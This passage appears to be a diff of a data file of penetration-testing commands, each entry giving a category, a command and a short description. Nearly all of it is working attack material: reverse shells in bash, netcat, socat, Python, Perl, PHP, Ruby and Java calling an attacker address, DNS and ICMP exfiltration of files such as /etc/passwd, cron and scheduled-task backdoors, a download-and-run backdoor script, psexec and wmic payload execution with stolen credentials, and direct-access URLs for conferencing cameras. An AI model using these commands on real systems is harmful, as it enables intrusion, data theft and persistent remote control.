{"category": "VPN", "command": "ettercap -T -M arp // //", "description": "Restart Ettercap without filter"}
|
| 637 |
+
{"category": "PuTTY", "command": "[HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions\\Default%20Settings] \"LogFileName\"=\"%TEMP%\\\\putty.dat\" \"LogType\"=dword:00000002", "description": "Registry key to log all PuTTY activity"}
|
| 638 |
+
{"category": "File Transfer", "command": "echo open ip 21 > ftp.txt; echo user >> ftp.txt; echo pass >> ftp.txt; echo bin >> ftp.txt; echo GET file >> ftp.txt; echo bye >> ftp.txt; ftp -s:ftp.txt", "description": "Execute FTP commands from script file"}
|
| 639 |
+
{"category": "File Transfer", "command": "ncat ip 21 < ftp.txt", "description": "Alternative FTP transfer using ncat"}
|
| 640 |
+
{"category": "File Transfer", "command": "xxd -p secret file.hex", "description": "Hex encode file on victim (Linux)"}
|
| 641 |
+
{"category": "File Transfer", "command": "for b in $(cat file.hex); do dig $b.shell.evilexample.com; done", "description": "DNS lookup for each hex line (victim)"}
|
| 642 |
+
{"category": "File Transfer", "command": "tcpdump -w /tmp/dns -s0 port 53 and host system.example.com", "description": "Capture DNS exfil packets (attacker)"}
|
| 643 |
+
{"category": "File Transfer", "command": "tcpdump -r /tmp/dns -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt", "description": "Extract hex from DNS packets (attacker)"}
|
| 644 |
+
{"category": "File Transfer", "command": "xxd -r -p received.txt keys.pgp", "description": "Reverse hex encoding (attacker)"}
|
| 645 |
+
{"category": "File Transfer", "command": "stringZ=$(cat /etc/passwd | od -tx1 | cut -c8- | tr -d \" \" | tr -d \"\\n\"); counter=0; while [ $counter -lt ${#stringZ} ]; do ping -s 16 -c 1 -p ${stringZ:$counter:16} 192.168.10.10 && counter=$((counter+16)); done", "description": "Exfil command output over ICMP (victim)"}
|
| 646 |
+
{"category": "File Transfer", "command": "tcpdump -ntvvSxs 0 'icmp[0]=8' -w data.dmp; grep Ox0020 data.dmp | cut -c21- | tr -d \" \" | tr -d \"\\n\" | xxd -r -p", "description": "Capture and parse ICMP exfil (attacker)"}
|
| 647 |
+
{"category": "File Transfer", "command": "telnet x.x.x.x 25; HELO x.x.x.x; MAIL FROM: [email protected]; RCPT TO: [email protected]; DATA; Thank You.; .; quit", "description": "Send email via telnet (open mail relay)"}
|
| 648 |
+
{"category": "Reverse Shells", "command": "nc 10.0.0.1 1234 -e /bin/sh", "description": "Netcat reverse shell (Linux)"}
|
| 649 |
+
{"category": "Reverse Shells", "command": "ncat 10.0.0.1 1234 --exec /bin/sh", "description": "Ncat reverse shell (Linux)"}
|
| 650 |
+
{"category": "Reverse Shells", "command": "nc 10.0.0.1 1234 -e cmd.exe", "description": "Netcat reverse shell (Windows)"}
|
| 651 |
+
{"category": "Reverse Shells", "command": "ncat 10.0.0.1 1234 --exec cmd.exe", "description": "Ncat reverse shell (Windows)"}
|
| 652 |
+
{"category": "Reverse Shells", "command": "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f", "description": "Netcat reverse shell without -e option"}
|
| 653 |
+
{"category": "Reverse Shells", "command": "socat TCP:10.0.0.1:1234 EXEC:/bin/sh", "description": "Socat reverse shell (Linux)"}
|
| 654 |
+
{"category": "Reverse Shells", "command": "perl -e 'use Socket; $i=\"10.0.0.1\"; $p=1234; socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,\">&S\"); open(STDOUT,\">&S\"); open(STDERR,\">&S\"); exec(\"/bin/sh -i\"); };'", "description": "Perl reverse shell (Linux)"}
|
| 655 |
+
{"category": "Reverse Shells", "command": "perl -MIO -e '$p=fork; exit if $p; $c=new IO::Socket::INET(PeerAddr,\"attackerip:4444\"); STDIN->fdopen($c,r); $~->fdopen($c,w); system $_ while <>; '", "description": "Perl reverse shell without /bin/sh"}
|
| 656 |
+
{"category": "Reverse Shells", "command": "perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"attackerip:4444\"); STDIN->fdopen($c,r); $~->fdopen($c,w); system $_ while <>; '", "description": "Perl reverse shell (Windows)"}
|
| 657 |
+
{"category": "Reverse Shells", "command": "python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"10.0.0.1\",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);'", "description": "Python reverse shell (Linux)"}
|
| 658 |
+
{"category": "Reverse Shells", "command": "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1", "description": "Bash reverse shell"}
|
| 659 |
+
{"category": "Reverse Shells", "command": "r = Runtime.getRuntime(); p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[]); p.waitFor();", "description": "Java reverse shell"}
|
| 660 |
+
{"category": "Reverse Shells", "command": "php -r '$sock=fsockopen(\"10.0.0.1\",1234); exec(\"/bin/sh -i <&3 >&3 2>&3\");'", "description": "PHP reverse shell"}
|
| 661 |
+
{"category": "Reverse Shells", "command": "ruby -rsocket -e 'f=TCPSocket.open(\"10.0.0.1\",1234).to_i; exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'", "description": "Ruby reverse shell (Linux)"}
|
| 662 |
+
{"category": "Reverse Shells", "command": "ruby -rsocket -e 'exit if fork; c=TCPSocket.new(\"attackerip\",\"4444\"); while(cmd=c.gets); IO.popen(cmd,\"r\"){|io|c.print io.read} end'", "description": "Ruby reverse shell without /bin/sh"}
|
| 663 |
+
{"category": "Reverse Shells", "command": "ruby -rsocket -e 'c=TCPSocket.new(\"attackerip\",\"4444\"); while(cmd=c.gets); IO.popen(cmd,\"r\"){|io|c.print io.read} end'", "description": "Ruby reverse shell (Windows)"}
|
| 664 |
+
{"category": "Reverse Shells", "command": "rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p | /bin/bash 1>/tmp/p", "description": "Telnet reverse shell (option 1)"}
|
| 665 |
+
{"category": "Reverse Shells", "command": "telnet attackerip 4444 | /bin/bash | telnet attackerip 4445", "description": "Telnet reverse shell (option 2)"}
|
| 666 |
+
{"category": "Reverse Shells", "command": "xterm -display 10.0.0.1:1; Xnest :1; xhost +victimIP", "description": "Xterm reverse shell with listener setup"}
|
| 667 |
+
{"category": "Persistence", "command": "crontab -e; 0-59/10 * * * * nc ip 777 -e /bin/bash", "description": "Linux persistence via crontab (every 10 min)"}
|
| 668 |
+
{"category": "Persistence", "command": "sc config schedule start=auto; net start schedule; at 13:30 \"C:\\nc.exe ip 777 -e cmd.exe\"", "description": "Windows task scheduler persistence (legacy)"}
|
| 669 |
+
{"category": "Persistence", "command": "schtasks /create /tn \"Backdoor\" /tr \"C:\\nc.exe ip 777 -e cmd.exe\" /sc daily /st 13:30 /ru System", "description": "Windows task scheduler persistence (modern)"}
|
| 670 |
+
{"category": "Persistence", "command": "REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v firewall /t REG_SZ /d \"c:\\windows\\system32\\backdoor.exe\" /f; at 19:00 /every:M,T,W,Th,F cmd /c start \"%USERPROFILE%\\backdoor.exe\"; SCHTASKS /Create /RU \"SYSTEM\" /SC MINUTE /MO 45 /TN FIREWALL /TR \"%USERPROFILE%\\backdoor.exe\" /ED 12/12/2012", "description": "Windows persistent backdoor with firewall bypass"}
|
| 671 |
+
{"category": "Persistence", "command": "wget http://server/backdoor.sh -O - | sh", "description": "Download and run backdoor script (Linux)"}
|
| 672 |
+
{"category": "Remote Payload Deployment", "command": "net share payload_share=C:\\payload_folder /grant:Everyone,FULL", "description": "Share payload folder via SMB (victim)"}
|
| 673 |
+
{"category": "Remote Payload Deployment", "command": "psexec \\\\remote_ip /u domain\\compromised_user /p password \"\\\\payload_ip\\test\\msf.exe\"", "description": "Execute payload via SMB (psexec)"}
|
| 674 |
+
{"category": "Remote Payload Deployment", "command": "wmic /node:remote_ip /user:domain\\compromised_user /password:password process call create \"\\\\payload_ip\\test\\msf.exe\"", "description": "Execute payload via SMB (wmic)"}
|
| 675 |
+
{"category": "Remote Payload Deployment", "command": "use auxiliary/server/webdav_file_server; set localexe true; set localfile payload; set localroot payload_directory; set disablePayloadHandler true; run; psexec \\\\remote_ip /u domain\\compromised_user /p password \"\\\\payload_ip\\test\\msf.exe\"", "description": "Deploy payload via WebDAV (Metasploit)"}
|
| 676 |
+
{"category": "Tunneling", "command": "fpipe.exe -l 1234 -r 80 2.2.2.2", "description": "Listen on 1234, forward to port 80"}
|
| 677 |
+
{"category": "Tunneling", "command": "socks.exe -i 1.1.1.1 -p 8080", "description": "SOCKS proxy on redirector (1.1.1.1:8080)"}
|
| 678 |
+
{"category": "Tunneling", "command": "proxychains4 nmap -Pn -vv -sT -p 22,135,139,445 2.2.2.2", "description": "Scan intranet through SOCKS proxy"}
|
| 679 |
+
{"category": "Tunneling", "command": "socat TCP4-LISTEN:1234 TCP4:2.2.2.2:80", "description": "Listen on 1234, forward to port 80"}
|
| 680 |
+
{"category": "Tunneling", "command": "echo -e \"[netcat client]\\nclient = yes\\naccept = 5555\\nconnect = listening_ip:4444\" > /etc/stunnel/stunnel.conf; echo -e \"[netcat server]\\nclient = no\\naccept = 4444\\nconnect = 127.0.0.1:4444\" > /etc/stunnel/stunnel.conf; stunnel; nc -vlp 4444", "description": "SSL encapsulated netcat tunnel"}
|
| 681 |
+
{"category": "Google Hacking", "command": "numrange:[#]-[#]", "description": "Search within a number range"}
|
| 682 |
+
{"category": "Google Hacking", "command": "date:[#]", "description": "Search within past [#] months"}
|
| 683 |
+
{"category": "Google Hacking", "command": "link:[url]", "description": "Find pages that link to [url]"}
|
| 684 |
+
{"category": "Google Hacking", "command": "related:[url]", "description": "Find pages related to [url]"}
|
| 685 |
+
{"category": "Google Hacking", "command": "intitle:[string]", "description": "Find pages with [string] in title"}
|
| 686 |
+
{"category": "Google Hacking", "command": "inurl:[string]", "description": "Find pages with [string] in URL"}
|
| 687 |
+
{"category": "Google Hacking", "command": "filetype:[xls]", "description": "Find files of type xls"}
|
| 688 |
+
{"category": "Google Hacking", "command": "phonebook:[name]", "description": "Find phone book listings of [name]"}
|
| 689 |
+
{"category": "Video Teleconferencing", "command": "telnet ip", "description": "Polycom: Enter 1 char to get uname:pwd"}
|
| 690 |
+
{"category": "Video Teleconferencing", "command": "http://ip/getsecure.cgi", "description": "Polycom: Access secure config"}
|
| 691 |
+
{"category": "Video Teleconferencing", "command": "http://ip/erarcl.htm", "description": "Polycom: Access remote control"}
|
| 692 |
+
{"category": "Video Teleconferencing", "command": "http://ip/asecurity.htm", "description": "Polycom: Access security settings"}
|
| 693 |
+
{"category": "Video Teleconferencing", "command": "http://ip/arc.htm", "description": "Polycom: Access remote control"}
|
| 694 |
+
{"category": "Video Teleconferencing", "command": "http://ip/firmwareVersion", "description": "Polycom: Check firmware version"}
|
| 695 |
+
{"category": "Video Teleconferencing", "command": "http://ip/snapctrl.ssi", "description": "Tandberg: Access snapshot control"}
|
| 696 |
+
{"category": "Video Teleconferencing", "command": "http://ip/command/visca-gen.cgi?visca=8101046202FF", "description": "Sony Webcam: Freeze camera"}
|